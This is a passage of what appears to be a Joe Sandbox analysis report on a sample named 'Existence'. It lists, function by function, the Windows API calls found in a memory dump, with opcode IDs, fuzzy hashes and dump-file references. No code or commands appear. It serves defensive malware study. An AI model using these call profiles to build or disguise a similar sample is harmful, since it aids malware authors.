                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2864067406-0
                                                                                                                                                                                          • Opcode ID: 9aa7e27360753cf7c396c09820a7cb13f88be82f14262db5a7e41eb967d5e76b
                                                                                                                                                                                          • Instruction ID: 6fed6ae6fcd2f94a601ee95b8ce1ab4dc86686ed069d90f1ac3cbf55be02f1a7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9aa7e27360753cf7c396c09820a7cb13f88be82f14262db5a7e41eb967d5e76b
                                                                                                                                                                                          • Instruction Fuzzy Hash: D5219A36600018BFCF658F98C84CEAE7BB9FB49350F40806DFA059B1A1D7799D51DB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,007CDC30), ref: 0079DBA6
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0079DBB5
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0079DBC4
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007CDC30), ref: 0079DC21
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2267087916-0
                                                                                                                                                                                          • Opcode ID: 434ab7af8111269d889084487afa72b7db7245cf0a578ca12d7cdcb3a6dad410
                                                                                                                                                                                          • Instruction ID: d8bc307e34fd491e108af5e8fe91128f1548ba6a4bf468e02e4462319d9aa061
                                                                                                                                                                                          • Opcode Fuzzy Hash: 434ab7af8111269d889084487afa72b7db7245cf0a578ca12d7cdcb3a6dad410
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9921B570108301DF8B20DF24D98489BB7E8FE56364F104A1DF499C32A2D779DD46CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 007C32A6
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007C32C0
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007C32CE
                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007C32DC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2169480361-0
                                                                                                                                                                                          • Opcode ID: b42a8fb7bb472a85dddf830a06b443e0a7b641ff0cb726290a98e403b127f601
                                                                                                                                                                                          • Instruction ID: ee4e31bbfa37daabcfa37d36ac03d1112deb90a0700a9a396834ebb96bcd90bd
                                                                                                                                                                                          • Opcode Fuzzy Hash: b42a8fb7bb472a85dddf830a06b443e0a7b641ff0cb726290a98e403b127f601
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C21B331205511AFEB159B24C849F6ABB95FF85324F24C25CF8268B2D2C779EE41CBD0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 007AD8CE
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 007AD92F
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 007AD943
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 234945975-0
                                                                                                                                                                                          • Opcode ID: 854302e05dc649299c427ef72c883364e027ae883d9284942fa6909a51196dd6
                                                                                                                                                                                          • Instruction ID: fd6961014f8bc5be57d021c512eab716000fc5a9d7e92653e180319e0557395f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 854302e05dc649299c427ef72c883364e027ae883d9284942fa6909a51196dd6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 68219DB1500705EFE7309F65C888BABB7F8EB82314F10852EE64692541E778FE05CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007996E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00798271,?,000000FF,?,007990BB,00000000,?,0000001C,?,?), ref: 007996F3
                                                                                                                                                                                            • Part of subcall function 007996E4: lstrcpyW.KERNEL32(00000000,?), ref: 00799719
                                                                                                                                                                                            • Part of subcall function 007996E4: lstrcmpiW.KERNEL32(00000000,?,00798271,?,000000FF,?,007990BB,00000000,?,0000001C,?,?), ref: 0079974A
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,007990BB,00000000,?,0000001C,?,?,00000000), ref: 0079828A
                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 007982B0
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,007990BB,00000000,?,0000001C,?,?,00000000), ref: 007982EB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                          • String ID: cdecl
                                                                                                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                                                                                                          • Opcode ID: 5748418b73475688a4b431e41b42ab93f4f90f7c71610c630ccb85b6e87d86bf
                                                                                                                                                                                          • Instruction ID: fe6765b0d6346091a1112d60de8249fed38fdbc0a7139c4dd6f4824cac6f1eea
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5748418b73475688a4b431e41b42ab93f4f90f7c71610c630ccb85b6e87d86bf
                                                                                                                                                                                          • Instruction Fuzzy Hash: C311037A200245ABCF149F38E849E7A77A9FF49750B10802EFD02C7250EF399811C796
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 007C615A
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C616C
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C6177
                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 007C62B5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend_wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 455545452-0
                                                                                                                                                                                          • Opcode ID: ed4f1a09870fa33c80fae9aeb2e71773fb92783dc20f7ef9f2e309af8e5cb88f
                                                                                                                                                                                          • Instruction ID: 315881474eb77e735bb2d23eb04ae0d793cc1d5e483d4eeb7c45896452c9fcf9
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed4f1a09870fa33c80fae9aeb2e71773fb92783dc20f7ef9f2e309af8e5cb88f
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF119075600218A6DF20DF648CC8FEF77BCEB55754B14412EFA11D6082EBB8D985CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4afff6a9dfc759cbafccda41ed482cbfcd6d642c0e2c9ebdcd738367d52dabf0
                                                                                                                                                                                          • Instruction ID: 5565d77a89435b84c3d5742126e1fdf6c5096e87ffe93fe03ce9f488f3b76a6b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4afff6a9dfc759cbafccda41ed482cbfcd6d642c0e2c9ebdcd738367d52dabf0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8301A7B2609A1A7FF6B12678ACC4F67670DDF417B8B354325BD23911D3DF688C419160
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00792394
                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007923A6
                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007923BC
                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007923D7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: eec72d642f1fdd2e6830ca3bcfc5356e31c664a3214825af45aa9aa77ae5a450
                                                                                                                                                                                          • Instruction ID: 489f261d2263a63f45acf7722c9b82888fbf05aa9f31555038f330e428453954
                                                                                                                                                                                          • Opcode Fuzzy Hash: eec72d642f1fdd2e6830ca3bcfc5356e31c664a3214825af45aa9aa77ae5a450
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5311273A900218FFEF11ABA4CD85F9DBB78EB08750F200091EA00B7290D6756E11DB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00731AF4
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 007731F9
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00773203
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 0077320E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4127811313-0
                                                                                                                                                                                          • Opcode ID: 5a7f3ed6eef33c3659ca45637ff19e2a4abb01c391b223b72af1d30b09e29d0d
                                                                                                                                                                                          • Instruction ID: 02d8987fabe677eeb1b9ca32d2817e8cecefb4d1d718bc6a86c5cd894e8b7a60
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a7f3ed6eef33c3659ca45637ff19e2a4abb01c391b223b72af1d30b09e29d0d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 75116A31A01019EBDF10DFA8C849DEEB7B8FB05381F508466EA02E2141C778BA91DBA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0079EB14
                                                                                                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 0079EB47
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0079EB5D
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0079EB64
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2880819207-0
                                                                                                                                                                                          • Opcode ID: 6f5bdbd757096919d73ad3b2324163038587f12b118e4ab60f41fa3d50af130e
                                                                                                                                                                                          • Instruction ID: 13f5100b595abb91a74d6474303811db3f26f1db735ca5f9c9a4918df450cb5e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f5bdbd757096919d73ad3b2324163038587f12b118e4ab60f41fa3d50af130e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F11CCB5900258BBCB11DBA89C09E9A7F6DBB45310F158269F815D3390D6B98D048761
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,?,0075D369,00000000,00000004,00000000), ref: 0075D588
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0075D594
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0075D59B
                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 0075D5B9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 173952441-0
                                                                                                                                                                                          • Opcode ID: 2b531d903764fa520fbc6305f1f83a897f51ae048c27c3e07c309e9e8ddf3652
                                                                                                                                                                                          • Instruction ID: e7dfa2bdf99b99b0d36f38a02129dd9204714a58b3fe27f2d7bb71e6f0ac2884
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b531d903764fa520fbc6305f1f83a897f51ae048c27c3e07c309e9e8ddf3652
                                                                                                                                                                                          • Instruction Fuzzy Hash: D701C472401554EBDB316FA5DC09FEA7B69EF41336F104229FD25861E0EBF88C19C6A1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007378B1
                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 007378C5
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 007378CF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3970641297-0
                                                                                                                                                                                          • Opcode ID: 7f7618282459d3a65615f283c2932cdbf037653e01b24063b314d8fab7ed95f5
                                                                                                                                                                                          • Instruction ID: e7e8123328a16212b206264a25a34f233e562548e665dc72e5514a1f6d7385f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f7618282459d3a65615f283c2932cdbf037653e01b24063b314d8fab7ed95f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6611D2B2505508BFEF265F90CC58EEABB6DFF083A4F044129FA0452120D739DC60EBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0076338D,00000364,00000000,00000000,00000000,?,007635FE,00000006,FlsSetValue), ref: 00763418
                                                                                                                                                                                          • GetLastError.KERNEL32(?,0076338D,00000364,00000000,00000000,00000000,?,007635FE,00000006,FlsSetValue,007D3260,FlsSetValue,00000000,00000364,?,007631B9), ref: 00763424
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0076338D,00000364,00000000,00000000,00000000,?,007635FE,00000006,FlsSetValue,007D3260,FlsSetValue,00000000), ref: 00763432
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                          • Opcode ID: eebba19b1445882300a622d34e514a5260a938159b4fb7de276ac505897caf58
                                                                                                                                                                                          • Instruction ID: 5357517bc292728977a2a3aebd50bd6c49d4fe74eec08c78adec5300ceaa9ec4
                                                                                                                                                                                          • Opcode Fuzzy Hash: eebba19b1445882300a622d34e514a5260a938159b4fb7de276ac505897caf58
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0017132A112669BDB324B69DC44966BF58BF05BB17214624FD07D7181DB28DD02C6E4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00797DE6
                                                                                                                                                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00797DFE
                                                                                                                                                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00797E13
                                                                                                                                                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00797E31
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                                                                          • String ID:
